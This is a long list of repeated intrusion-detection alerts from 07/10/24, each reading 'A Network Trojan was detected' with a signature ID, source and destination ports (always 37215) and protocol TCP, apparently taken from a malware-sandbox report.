                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.054152
                  SID:2835222
                  Source Port:51486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.848972
                  SID:2835222
                  Source Port:35342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.638396
                  SID:2835222
                  Source Port:51866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.584123
                  SID:2829579
                  Source Port:45088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.003897
                  SID:2835222
                  Source Port:43570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.454232
                  SID:2835222
                  Source Port:58664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.644926
                  SID:2829579
                  Source Port:60434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.572595
                  SID:2829579
                  Source Port:48152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.965651
                  SID:2835222
                  Source Port:52576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.283062
                  SID:2835222
                  Source Port:44570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.854360
                  SID:2829579
                  Source Port:56880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.156070
                  SID:2829579
                  Source Port:51454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.609490
                  SID:2829579
                  Source Port:44266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.808295
                  SID:2829579
                  Source Port:51966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.961699
                  SID:2829579
                  Source Port:35590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.990905
                  SID:2835222
                  Source Port:40396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.917440
                  SID:2829579
                  Source Port:58666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.030907
                  SID:2835222
                  Source Port:52420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.027342
                  SID:2829579
                  Source Port:49252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.468689
                  SID:2835222
                  Source Port:58380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.148495
                  SID:2835222
                  Source Port:44656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.634541
                  SID:2835222
                  Source Port:60312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.857933
                  SID:2835222
                  Source Port:44508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.834166
                  SID:2835222
                  Source Port:37086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.733003
                  SID:2835222
                  Source Port:48432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.256759
                  SID:2829579
                  Source Port:35206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.924312
                  SID:2829579
                  Source Port:35470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.767416
                  SID:2835222
                  Source Port:39154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.164336
                  SID:2829579
                  Source Port:45332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.866007
                  SID:2835222
                  Source Port:57548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.398015
                  SID:2829579
                  Source Port:46430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.429054
                  SID:2835222
                  Source Port:46612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.152764
                  SID:2835222
                  Source Port:40072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.872449
                  SID:2835222
                  Source Port:50098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.609301
                  SID:2835222
                  Source Port:51248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.057215
                  SID:2829579
                  Source Port:46066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.145425
                  SID:2835222
                  Source Port:59406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.011560
                  SID:2829579
                  Source Port:51848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.022259
                  SID:2829579
                  Source Port:41450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.330413
                  SID:2829579
                  Source Port:51320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.184219
                  SID:2829579
                  Source Port:56818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.823205
                  SID:2835222
                  Source Port:41420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.388758
                  SID:2829579
                  Source Port:46696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.055054
                  SID:2829579
                  Source Port:38080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.294251
                  SID:2835222
                  Source Port:48032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.479148
                  SID:2835222
                  Source Port:57104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.446439
                  SID:2835222
                  Source Port:54176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.122842
                  SID:2835222
                  Source Port:44704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.585190
                  SID:2835222
                  Source Port:48006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.861640
                  SID:2835222
                  Source Port:46846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.602369
                  SID:2829579
                  Source Port:34250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.566526
                  SID:2835222
                  Source Port:53166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.180841
                  SID:2835222
                  Source Port:58800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.931783
                  SID:2835222
                  Source Port:56106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.360757
                  SID:2835222
                  Source Port:52178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.412388
                  SID:2829579
                  Source Port:48214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.470125
                  SID:2829579
                  Source Port:33068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.152764
                  SID:2835222
                  Source Port:53864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.975422
                  SID:2835222
                  Source Port:40472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.853796
                  SID:2829579
                  Source Port:55300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.658896
                  SID:2835222
                  Source Port:37132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.763927
                  SID:2835222
                  Source Port:54796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.835368
                  SID:2835222
                  Source Port:40706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.573174
                  SID:2835222
                  Source Port:55628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.524750
                  SID:2829579
                  Source Port:36606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.562585
                  SID:2829579
                  Source Port:33562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.919231
                  SID:2835222
                  Source Port:42328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.551943
                  SID:2835222
                  Source Port:41252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.566037
                  SID:2829579
                  Source Port:34638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.284059
                  SID:2835222
                  Source Port:53742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.586309
                  SID:2835222
                  Source Port:45494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.205499
                  SID:2835222
                  Source Port:37280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.051203
                  SID:2829579
                  Source Port:46836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.313392
                  SID:2829579
                  Source Port:40970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.876797
                  SID:2835222
                  Source Port:47428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.440414
                  SID:2829579
                  Source Port:45110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:36.290826
                  SID:2835222
                  Source Port:53616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.173873
                  SID:2829579
                  Source Port:46808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.077286
                  SID:2835222
                  Source Port:44112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.798286
                  SID:2829579
                  Source Port:33686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.518150
                  SID:2835222
                  Source Port:33800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.578740
                  SID:2829579
                  Source Port:55830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.488674
                  SID:2829579
                  Source Port:44846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.920264
                  SID:2829579
                  Source Port:36730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.407973
                  SID:2835222
                  Source Port:42184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.933936
                  SID:2829579
                  Source Port:32876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.786182
                  SID:2835222
                  Source Port:42874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.970801
                  SID:2829579
                  Source Port:40778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.193569
                  SID:2829579
                  Source Port:34788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.136584
                  SID:2835222
                  Source Port:50420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.081340
                  SID:2835222
                  Source Port:41154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.613863
                  SID:2829579
                  Source Port:33772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.158777
                  SID:2829579
                  Source Port:50030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.123871
                  SID:2835222
                  Source Port:51580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.239343
                  SID:2835222
                  Source Port:55772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.658775
                  SID:2835222
                  Source Port:57534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.093525
                  SID:2829579
                  Source Port:48494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.030182
                  SID:2829579
                  Source Port:46028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.801971
                  SID:2829579
                  Source Port:42148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.730213
                  SID:2835222
                  Source Port:48212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.621778
                  SID:2829579
                  Source Port:40364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.053819
                  SID:2829579
                  Source Port:36002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.361617
                  SID:2829579
                  Source Port:59846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.534289
                  SID:2835222
                  Source Port:37090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.538368
                  SID:2835222
                  Source Port:60074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.516253
                  SID:2829579
                  Source Port:46070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.619683
                  SID:2829579
                  Source Port:49244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.389213
                  SID:2835222
                  Source Port:36132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.303289
                  SID:2829579
                  Source Port:33522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.197956
                  SID:2829579
                  Source Port:43600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.751989
                  SID:2829579
                  Source Port:57828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.527287
                  SID:2829579
                  Source Port:50684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.373847
                  SID:2835222
                  Source Port:34124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.349014
                  SID:2829579
                  Source Port:59492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.514336
                  SID:2835222
                  Source Port:41608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.791057
                  SID:2829579
                  Source Port:32822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.823408
                  SID:2835222
                  Source Port:52850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.435452
                  SID:2829579
                  Source Port:48278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.329948
                  SID:2829579
                  Source Port:45168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.492137
                  SID:2829579
                  Source Port:52876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.397688
                  SID:2829579
                  Source Port:60166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.189458
                  SID:2835222
                  Source Port:59010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.851044
                  SID:2829579
                  Source Port:39094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.803034
                  SID:2829579
                  Source Port:49292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.792004
                  SID:2829579
                  Source Port:38832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.433645
                  SID:2835222
                  Source Port:48420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.831762
                  SID:2829579
                  Source Port:59842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.819309
                  SID:2829579
                  Source Port:42638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.881879
                  SID:2835222
                  Source Port:54710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.933430
                  SID:2835222
                  Source Port:45392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.522972
                  SID:2829579
                  Source Port:47728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.356151
                  SID:2829579
                  Source Port:45654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.901857
                  SID:2829579
                  Source Port:48110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.652000
                  SID:2835222
                  Source Port:58514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.692447
                  SID:2835222
                  Source Port:59404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.078951
                  SID:2829579
                  Source Port:40544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.143862
                  SID:2829579
                  Source Port:57796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.766044
                  SID:2835222
                  Source Port:34370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.970301
                  SID:2829579
                  Source Port:50754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.622039
                  SID:2835222
                  Source Port:55144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.132992
                  SID:2829579
                  Source Port:41200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.176669
                  SID:2829579
                  Source Port:38966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.872041
                  SID:2835222
                  Source Port:49476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.611140
                  SID:2835222
                  Source Port:55142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.594883
                  SID:2829579
                  Source Port:46742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.536872
                  SID:2829579
                  Source Port:54200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.337218
                  SID:2829579
                  Source Port:39854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.752380
                  SID:2829579
                  Source Port:54904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.464906
                  SID:2829579
                  Source Port:56996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.103599
                  SID:2829579
                  Source Port:43738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.746309
                  SID:2835222
                  Source Port:55556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.897837
                  SID:2829579
                  Source Port:56560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.850530
                  SID:2835222
                  Source Port:57982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.369932
                  SID:2835222
                  Source Port:36770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.216648
                  SID:2835222
                  Source Port:38626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.548799
                  SID:2835222
                  Source Port:48420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.607360
                  SID:2829579
                  Source Port:58484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.783932
                  SID:2829579
                  Source Port:54884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.553454
                  SID:2829579
                  Source Port:45858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.190185
                  SID:2835222
                  Source Port:52774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.488925
                  SID:2829579
                  Source Port:39838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.565038
                  SID:2829579
                  Source Port:39642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.862612
                  SID:2835222
                  Source Port:48996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.370948
                  SID:2835222
                  Source Port:41640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.912600
                  SID:2829579
                  Source Port:35178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.412009
                  SID:2829579
                  Source Port:59404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.505236
                  SID:2829579
                  Source Port:54692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.538076
                  SID:2835222
                  Source Port:41490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.875965
                  SID:2829579
                  Source Port:59478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.860796
                  SID:2835222
                  Source Port:50116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.927826
                  SID:2835222
                  Source Port:53482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.530156
                  SID:2829579
                  Source Port:54396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.682108
                  SID:2829579
                  Source Port:52918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.611228
                  SID:2829579
                  Source Port:57674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.861984
                  SID:2829579
                  Source Port:33500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.794949
                  SID:2829579
                  Source Port:55524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.420210
                  SID:2835222
                  Source Port:59168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.437596
                  SID:2829579
                  Source Port:41534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.844919
                  SID:2829579
                  Source Port:60926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.077257
                  SID:2829579
                  Source Port:53442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.138927
                  SID:2829579
                  Source Port:46282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.625471
                  SID:2835222
                  Source Port:52956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.585577
                  SID:2829579
                  Source Port:52260
                  Destination Port:37215
